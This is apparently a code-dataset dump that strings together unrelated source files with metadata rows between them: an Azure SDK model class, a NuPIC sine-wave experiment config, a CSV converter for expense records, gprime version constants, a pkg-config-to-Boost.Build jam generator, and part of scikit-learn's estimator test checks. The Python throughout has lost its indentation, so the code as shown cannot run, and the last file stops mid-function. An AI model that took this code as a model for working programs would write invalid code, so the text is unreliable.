# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CheckNameAvailabilityResult(Model):
"""
The CheckNameAvailability operation response.
:param name_available: Gets a boolean value that indicates whether the
name is available for you to use. If true, the name is available. If
false, the name is already taken or invalid and cannot be used.
:type name_available: bool
:param reason: Gets the reason that a storage account name could not be
used. The Reason element is only returned if NameAvailable is false.
Possible values include: 'AccountNameInvalid', 'AlreadyExists'
:type reason: str or :class:`Reason
<storagemanagementclient.models.Reason>`
:param message: Gets an error message explaining the Reason value in more
detail.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'Reason'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(self, name_available=None, reason=None, message=None):
self.name_available = name_available
self.reason = reason
self.message = message
| mit | 6,416,804,943,986,815,000 | 39.071429 | 77 | 0.630422 | false |
akhilaananthram/nupic.research | sequence_prediction/continuous_sequence/swarm_sine/description.py | 1 | 12630 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ycui/nta/nupic/nupic/frameworks/opf/exp_generator/ExpGenerator.pyc'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer
)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalMultiStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# 'encoders': {'field1': {'fieldname': 'field1', 'n':100,
# 'name': 'field1', 'type': 'AdaptiveScalarEncoder',
# 'w': 21}}
#
'encoders': {
u'data': { 'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': u'data',
'type': 'ScalarEncoder',
'w': 21},
'_classifierInput': { 'classifierOnly': True,
'clipInput': True,
'fieldname': u'data',
'maxval': 1.0,
'minval': -1.0,
'n': 100,
'name': '_classifierInput',
'type': 'ScalarEncoder',
'w': 21},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys are any combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# Spatial pooler implementation to use.
# Options: "py" (slow, good for debugging), and "cpp" (optimized).
'spatialImp': 'cpp',
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses.
'potentialPct': 0.8,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.05,
'synPermInactiveDec': 0.0005,
'maxBoost': 2.0
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
'newSynapseCount': 20,
# Maximum number of synapses per segment
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
'maxSegmentsPerCell': 128,
# Initial Permanence
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'anomalyParams': { u'anomalyCacheRecords': None,
u'autoDetectThreshold': None,
u'autoDetectWaitRecords': None},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupic/frameworks/opf/jsonschema/stream_def.json.
#
'dataset' : { u'info': u'sine',
u'streams': [ { u'columns': [u'*'],
u'info': u'sine.csv',
u'last_record': 1800,
u'source': u'file://data/sine.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
'iterationCount' : 4000,
# A dictionary containing all the supplementary parameters for inference
"inferenceArgs":{u'inputPredictedField': 'auto',
u'predictedField': u'data',
u'predictionSteps': [1]},
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'aae'}),
MetricSpec(field=u'data', metric='multiStep', inferenceElement='multiStepBestPredictions', params={'window': 1800, 'steps': [1], 'errorMetric': 'nrmse'})
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| gpl-3.0 | -6,689,820,296,016,079,000 | 35.293103 | 157 | 0.611876 | false |
mcxiaoke/python-labs | scripts/youqian2toshl.py | 1 | 1237 | #!/bin/env python3
import csv
import sys
from datetime import datetime
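# Convert a CSV exported by the "youqian" expense-tracking app into the CSV
# layout that the Toshl finance app imports: reformat the date to MM/DD/YY,
# remap a category, and reorder the columns.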
rows = []
with open(sys.argv[1]) as f:
fc = csv.reader(f)
headers = next(fc)
for r in fc:
di = datetime.strptime(r[0], '%Y-%m-%d')
r_date = datetime.strftime(di, '%m/%d/%y')
r_account = '现金'
r_cate = r[3]
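# Collapse the combined source category "零食烟酒" (snacks/tobacco/alcohol) into plain "零食" (snacks)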
if r_cate == '零食烟酒':
r_cate = '零食'
r_tag = ''
r_out = r[5]
r_in = '0'
r_type = 'CNY'
r_out2 = r[5]
r_type2 = 'CNY'
r_comment = r[4] + ' - '+r[7]
new_row = (r_date, r_account, r_cate, r_tag, r_out,
r_in, r_type, r_out2, r_type2, r_comment)
# print(r)
print(new_row)
rows.append(new_row)
# "日期","账户","类别","标签","支出金额","收入金额","货币","以主要货币","主要货币","说明"
# ('08/13/20', '现金', '零食', '', '35.50', '0', 'CNY', '35.50', 'CNY', '饮料 - 超市买纯净水M')
with open('to.csv', 'w') as f:
fc = csv.writer(f)
fc.writerow(('日期', '账户', '类别', '标签', '支出金额',
'收入金额', '货币', '以主要货币', '主要货币', '说明'))
for r in rows:
fc.writerow(r)
| apache-2.0 | -8,167,431,639,492,582,000 | 27.447368 | 83 | 0.454209 | false |
sam-m888/gprime | gprime/plugins/lib/libgrampsxml.py | 1 | 1440 | # gPrime - A web-based genealogy program
#
# Copyright (C) 2009 Brian G. Matherly
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gprime modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Public Constants
#
#------------------------------------------------------------------------
GRAMPS_XML_VERSION_TUPLE = (1, 7, 1) # version for Gramps 4.2
GRAMPS_XML_VERSION = '.'.join(str(i) for i in GRAMPS_XML_VERSION_TUPLE)
| gpl-2.0 | -4,108,599,244,960,862,700 | 37.918919 | 79 | 0.511111 | false |
rivelo/portal | gallery/views.py | 1 | 4808 | # -*- coding: utf-8 -*-
from django.http import HttpResponse
#from django.shortcuts import render_to_response
from django.shortcuts import render, redirect
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpRequest, HttpResponseNotFound
from django.conf import settings
from portal.event_calendar.views import embeded_calendar
from portal.funnies.views import get_funn
from models import Album, Photo
import gdata.photos.service
import gdata.media
import gdata.geo
def custom_proc(request):
"""A context processor that provides 'app', 'user' and 'ip_address'."""
return {
'app': 'Rivelo catalog',
'user': request.user,
'ip_address': request.META['REMOTE_ADDR']
}
def get_album():
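# Log in to Picasa Web Albums with the gdata client and return
# (all photo URLs, album titles) collected across the account's albums.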
list = []
album_list = []
gd_client = gdata.photos.service.PhotosService()
gd_client.email = "[email protected]"
gd_client.password = "gvelovelo"
gd_client.source = 'velorivne_albums'
gd_client.ProgrammaticLogin()
username = "[email protected]"
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
album_list.append(album.title.text)
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
list.append(photo.content.src)
return list, album_list
def albums_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
albums = Album.objects.all()
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'albums': albums, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
return render(request, 'index.html', vars)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
def album_page(request, id):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
album = Album.objects.get(album_id=id)
album_name = album.title + " - " + str(album.numphotos) + " фото"
photos = Photo.objects.filter(album = album)
vars = {'weblink': 'photo_album.html', 'sel_menu': 'photo', 'photo1': photo1, 'photo2': photo2, 'album_name': album_name, 'photos': photos, 'entry': get_funn()}
calendar = embeded_calendar()
vars.update(calendar)
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def gallery_page(request):
photo1 = Photo.objects.random()
photo2 = Photo.objects.random()
# p_list, albums = get_album()
albums = Album.objects.all()
p_list = Photo.objects.filter(album = albums[3])
vars = {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'photo1': photo1, 'photo2': photo2, 'albums': albums}
calendar = embeded_calendar()
vars.update(calendar)
#p_list = p_list[:10]
# return render_to_response('index.html', {'weblink': 'photo.html', 'sel_menu': 'photo', 'photo_list': p_list[:10], 'albums': albums}, context_instance=RequestContext(request, processors=[custom_proc]))
#return render_to_response('index.html', vars, context_instance=RequestContext(request, processors=[custom_proc]))
return render(request, 'index.html', vars)
def create_db(request):
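# Mirror the remote Picasa albums and their photos into the local
# Album/Photo tables, skipping records that already exist.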
username = '[email protected]'
gd_client = gdata.photos.service.PhotosService()
albums = gd_client.GetUserFeed(user=username)
for album in albums.entry:
print 'title: %s, number of photos: %s, id: %s' % (album.title.text, album.numphotos.text, album.gphoto_id.text)
try:
alb = Album(title=album.title.text, url=album.GetHtmlLink().href, numphotos=album.numphotos.text, album_id=album.gphoto_id.text)
alb.save()
except:
# album already exists: reuse the stored record so its photos attach to it
alb = Album.objects.get(album_id=album.gphoto_id.text)
photos = gd_client.GetFeed('/data/feed/api/user/%s/albumid/%s?kind=photo' % (username, album.gphoto_id.text))
for photo in photos.entry:
print 'Photo title:', photo.title.text
try:
p = Photo(album=alb, title=photo.title.text, image=photo.media.thumbnail[2].url, url=photo.content.src, pub_date=photo.timestamp.datetime(), filename=photo.media.title.text, photo_id=photo.gphoto_id.text, height=int(photos.entry[0].height.text), width=int(photos.entry[0].width.text))
p.save()
except:
# do not duplicate photos
pass
return HttpResponse("Дані додано")
| gpl-2.0 | 6,949,792,971,498,934,000 | 43.388889 | 300 | 0.664581 | false |
vmrob/needy | needy/generators/pkgconfig_jam.py | 1 | 6825 | from ..generator import Generator
import logging
import os
import subprocess
import textwrap
import hashlib
class PkgConfigJamGenerator(Generator):
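"""
Generates a ``pkgconfig.jam`` file in the needs directory that exposes
every package known to ``pkg-config`` as a Boost.Build alias target,
plus install targets that copy packages owned by needy into the
configured install prefix.
"""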
@staticmethod
def identifier():
return 'pkgconfig-jam'
def generate(self, needy):
path = os.path.join(needy.needs_directory(), 'pkgconfig.jam')
env = os.environ.copy()
env['PKG_CONFIG_LIBDIR'] = ''
packages, broken_package_names = self.__get_pkgconfig_packages(env=env)
owned_packages = self.__get_owned_packages(needy, packages)
if broken_package_names:
logging.warn('broken packages found: {}'.format(' '.join(broken_package_names)))
contents = self.__get_header(self.__escape(env.get('PKG_CONFIG_PATH', '')))
contents += self.__get_path_targets(needy, packages)
contents += self.__get_pkg_targets(needy, packages)
contents += self.__get_pkgconfig_rules(needy, packages, owned_packages, broken_package_names)
with open(path, 'w') as f:
f.write(contents)
@classmethod
def __get_pkgconfig_packages(cls, env):
packages = []
broken_package_names = []
package_names = [line.split()[0] for line in subprocess.check_output(['pkg-config', '--list-all'], env=env).decode().splitlines()]
for package in package_names:
try:
pkg = {}
pkg['name'] = package
pkg['location'] = os.path.realpath(subprocess.check_output(['pkg-config', package, '--variable=pcfiledir'], env=env).decode().strip())
pkg['cflags'] = subprocess.check_output(['pkg-config', package, '--cflags'], env=env).decode().strip()
pkg['ldflags'] = subprocess.check_output(['pkg-config', package, '--libs', '--static'], env=env).decode().strip()
packages.append(pkg)
except subprocess.CalledProcessError:
broken_package_names.append(package)
continue
return packages, broken_package_names
@classmethod
def __get_owned_packages(cls, needy, packages):
owned_packages = []
for package in packages:
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
owned_packages.append(package)
return owned_packages
@classmethod
def __get_header(cls, pkg_config_path):
return textwrap.dedent('''\
INSTALL_PREFIX = [ option.get prefix : "/usr/local" ] ;
PKG_CONFIG_PATH = "{pkg_config_path}" ;
import notfile ;
import project ;
local p = [ project.current ] ;
''').format(
pkg_config_path=pkg_config_path
)
@classmethod
def __get_path_targets(cls, needy, packages):
lines = ''
paths = set([os.path.abspath(os.path.join(p['location'], '..', '..')) for p in packages])
for path in paths:
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
# This is the worst. Specifically, Boost Build is the worst. Their semaphore
# targets appear to be entirely broken (in addition to factually incorrect
# documentation) and so we have to write our own semaphore to ensure that
# this sort of file copying to $(INSTALL_PREFIX) occurs atomically.
#
# The reason this is necessary at all is due to a race condition in
# cp/mkdir of the destination path that errors on duplicate
# files/directories even in the presence of the -p flag.
lines += textwrap.dedent('''\
actions copy-path-{path_hash}-action {{
set -e ; trap "{{ rmdir $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null || true ; }}" EXIT TERM INT
mkdir -p $(INSTALL_PREFIX) && test -d $(INSTALL_PREFIX) && test -w $(INSTALL_PREFIX)
until mkdir -p $(INSTALL_PREFIX)/needy-copy-path.lock 2>/dev/null ; do python -c "import time;time.sleep(0.1)" ; done
cp -pR {path}/* $(INSTALL_PREFIX)/
}}
notfile.notfile copy-path-{path_hash} : @$(__name__).copy-path-{path_hash}-action ;
$(p).mark-target-as-explicit copy-path-{path_hash} ;
''').format(path_hash=path_hash, path=path)
return lines
@classmethod
def __get_pkg_targets(cls, needy, packages):
lines = ''
for package in packages:
path = os.path.abspath(os.path.join(package['location'], '..', '..'))
path_hash = hashlib.sha256(path.encode('utf-8')).hexdigest().lower()
lines += 'alias {}-package : : : : <cflags>"{}" <linkflags>"{}" ;\n'.format(package['name'], PkgConfigJamGenerator.__escape(package['cflags']), PkgConfigJamGenerator.__escape(package['ldflags']))
lines += textwrap.dedent('''\
alias install-{package}-package : copy-path-{path_hash} ;
''').format(package=package['name'], path_hash=path_hash)
if not os.path.relpath(package['location'], os.path.realpath(needy.needs_directory())).startswith('..'):
lines += 'alias install-{package}-package-if-owned : install-{package}-package ;\n'.format(package=package['name'])
else:
lines += 'alias install-{package}-package-if-owned ;\n'.format(package=package['name'])
lines += textwrap.dedent('''\
$(p).mark-target-as-explicit install-{package}-package install-{package}-package-if-owned ;
''').format(package=package['name'])
return lines
@classmethod
def __get_pkgconfig_rules(cls, needy, packages, owned_packages, broken_package_names):
return textwrap.dedent('''\
PKG_CONFIG_PACKAGES = {pkg_config_packages} ;
OWNED_PKG_CONFIG_PACKAGES = {owned_pkg_config_packages} ;
rule dependency ( name : packages * ) {{
if ! $(packages) {{
packages = $(name) ;
}}
if $(packages) in $(PKG_CONFIG_PACKAGES) {{
alias $(name) : $(packages)-package ;
alias install-$(name)-if-owned : install-$(packages)-package-if-owned ;
local p = [ project.current ] ;
$(p).mark-target-as-explicit install-$(name)-if-owned ;
}}
}}
''').format(
pkg_config_packages=' '.join([package['name'] for package in packages if package['name'] not in broken_package_names]),
owned_pkg_config_packages=' '.join([p['name'] for p in owned_packages])
)
@classmethod
def __escape(cls, s):
return s.replace('\\', '\\\\').replace('"', '\\"')
| mit | 410,549,216,565,586,900 | 44.5 | 207 | 0.572161 | false |
0asa/scikit-learn | sklearn/utils/estimator_checks.py | 1 | 37529 | from __future__ import print_function
import warnings
import sys
import traceback
import inspect
import pickle
import numpy as np
from scipy import sparse
import struct
from sklearn.externals.six.moves import zip
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import META_ESTIMATORS
from sklearn.utils.testing import set_random_state
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import SkipTest
from sklearn.utils.testing import check_skip_travis
from sklearn.base import (clone, ClusterMixin, ClassifierMixin)
from sklearn.metrics import accuracy_score, adjusted_rand_score, f1_score
from sklearn.lda import LDA
from sklearn.random_projection import BaseRandomProjection
from sklearn.feature_selection import SelectKBest
from sklearn.svm.base import BaseLibSVM
from sklearn.utils.validation import DataConversionWarning, NotFittedError
from sklearn.cross_validation import train_test_split
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import load_iris, load_boston, make_blobs
BOSTON = None
CROSS_DECOMPOSITION = ['PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD']
def _boston_subset(n_samples=200):
global BOSTON
if BOSTON is None:
boston = load_boston()
X, y = boston.data, boston.target
X, y = shuffle(X, y, random_state=0)
X, y = X[:n_samples], y[:n_samples]
X = StandardScaler().fit_transform(X)
BOSTON = X, y
return BOSTON
def set_fast_parameters(estimator):
# speed up some estimators
params = estimator.get_params()
if "n_iter" in params:
estimator.set_params(n_iter=5)
if "max_iter" in params:
# NMF
if estimator.max_iter is not None:
estimator.set_params(max_iter=min(5, estimator.max_iter))
# LinearSVR
if estimator.__class__.__name__ == 'LinearSVR':
estimator.set_params(max_iter=20)
if "n_resampling" in params:
# randomized lasso
estimator.set_params(n_resampling=5)
if "n_estimators" in params:
# especially gradient boosting with default 100
estimator.set_params(n_estimators=min(5, estimator.n_estimators))
if "max_trials" in params:
# RANSAC
estimator.set_params(max_trials=10)
if "n_init" in params:
# K-Means
estimator.set_params(n_init=2)
if isinstance(estimator, BaseRandomProjection):
# Due to the jl lemma and often very few samples, the number
# of components of the random matrix projection will be probably
# greater than the number of features.
# So we impose a smaller number (avoid "auto" mode)
estimator.set_params(n_components=1)
if isinstance(estimator, SelectKBest):
# SelectKBest has a default of k=10
# which is more feature than we have in most case.
estimator.set_params(k=1)
class NotAnArray(object):
" An object that is convertable to an array"
def __init__(self, data):
self.data = data
def __array__(self, dtype=None):
return self.data
def _is_32bit():
"""Detect if process is 32bit Python."""
return struct.calcsize('P') * 8 == 32
def check_regressors_classifiers_sparse_data(name, Estimator):
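"""Check that the estimator either handles sparse input or fails with an
informative TypeError whose message mentions sparse input."""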
rng = np.random.RandomState(0)
X = rng.rand(40, 10)
X[X < .8] = 0
X = sparse.csr_matrix(X)
y = (4 * rng.rand(40)).astype(np.int)
# catch deprecation warnings
with warnings.catch_warnings():
estimator = Estimator()
set_fast_parameters(estimator)
# fit and predict
try:
estimator.fit(X, y)
estimator.predict(X)
if hasattr(estimator, 'predict_proba'):
estimator.predict_proba(X)
except TypeError as e:
if not 'sparse' in repr(e):
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: error message state explicitly that "
"sparse input is not supported if this is not the case."
% name)
raise
except Exception:
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: it should raise a TypeError if sparse input "
"is explicitly not supported." % name)
raise
def check_transformer(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
X -= X.min()
_check_transformer(name, Transformer, X, y)
_check_transformer(name, Transformer, X.tolist(), y.tolist())
def check_transformer_data_not_an_array(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
# We need to make sure that we have non negative data, for things
# like NMF
X -= X.min() - .1
this_X = NotAnArray(X)
this_y = NotAnArray(np.asarray(y))
_check_transformer(name, Transformer, this_X, this_y)
def check_transformers_unfitted(name, Transformer):
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
transformer = Transformer()
assert_raises(NotFittedError, transformer.transform, X)
def _check_transformer(name, Transformer, X, y):
if name in ('CCA', 'LocallyLinearEmbedding', 'KernelPCA') and _is_32bit():
# Those transformers yield non-deterministic output when executed on
# a 32bit Python. The same transformers are stable on 64bit Python.
# FIXME: try to isolate a minimalistic reproduction case only depending
# on numpy & scipy and/or maybe generate a test dataset that does not
# cause such unstable behaviors.
msg = name + ' is non deterministic on 32bit Python'
raise SkipTest(msg)
n_samples, n_features = np.asarray(X).shape
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
set_random_state(transformer)
if name == "KernelPCA":
transformer.remove_zero_eig = False
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.c_[y, y]
y_[::2, 1] *= 2
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple):
for x_pred in X_pred:
assert_equal(x_pred.shape[0], n_samples)
else:
assert_equal(X_pred.shape[0], n_samples)
if hasattr(transformer, 'transform'):
if name in CROSS_DECOMPOSITION:
X_pred2 = transformer.transform(X, y_)
X_pred3 = transformer.fit_transform(X, y=y_)
else:
X_pred2 = transformer.transform(X)
X_pred3 = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple) and isinstance(X_pred2, tuple):
for x_pred, x_pred2, x_pred3 in zip(X_pred, X_pred2, X_pred3):
assert_array_almost_equal(
x_pred, x_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
x_pred, x_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
else:
assert_array_almost_equal(
X_pred, X_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
X_pred, X_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
# raises error on malformed input for transform
if hasattr(X, 'T'):
# If it's not an array, it does not have a 'T' property
assert_raises(ValueError, transformer.transform, X.T)
def check_transformer_sparse_data(name, Transformer):
rng = np.random.RandomState(0)
X = rng.rand(40, 10)
X[X < .8] = 0
X = sparse.csr_matrix(X)
y = (4 * rng.rand(40)).astype(np.int)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
if name in ['Scaler', 'StandardScaler']:
transformer = Transformer(with_mean=False)
else:
transformer = Transformer()
set_fast_parameters(transformer)
# fit
try:
transformer.fit(X, y)
except TypeError as e:
if not 'sparse' in repr(e):
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: error message state explicitly that "
"sparse input is not supported if this is not the case."
% name)
raise
except Exception:
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: it should raise a TypeError if sparse input "
"is explicitly not supported." % name)
raise
def check_estimators_nan_inf(name, Estimator):
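"""Check that fit, predict and transform raise an informative ValueError
when the training or input data contain NaN or inf values."""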
rnd = np.random.RandomState(0)
X_train_finite = rnd.uniform(size=(10, 3))
X_train_nan = rnd.uniform(size=(10, 3))
X_train_nan[0, 0] = np.nan
X_train_inf = rnd.uniform(size=(10, 3))
X_train_inf[0, 0] = np.inf
y = np.ones(10)
y[:5] = 0
y = multioutput_estimator_convert_y_2d(name, y)
error_string_fit = "Estimator doesn't check for NaN and inf in fit."
error_string_predict = ("Estimator doesn't check for NaN and inf in"
" predict.")
error_string_transform = ("Estimator doesn't check for NaN and inf in"
" transform.")
for X_train in [X_train_nan, X_train_inf]:
# catch deprecation warnings
with warnings.catch_warnings(record=True):
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator, 1)
# try to fit
try:
if issubclass(Estimator, ClusterMixin):
estimator.fit(X_train)
else:
estimator.fit(X_train, y)
except ValueError as e:
if not 'inf' in repr(e) and not 'NaN' in repr(e):
print(error_string_fit, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
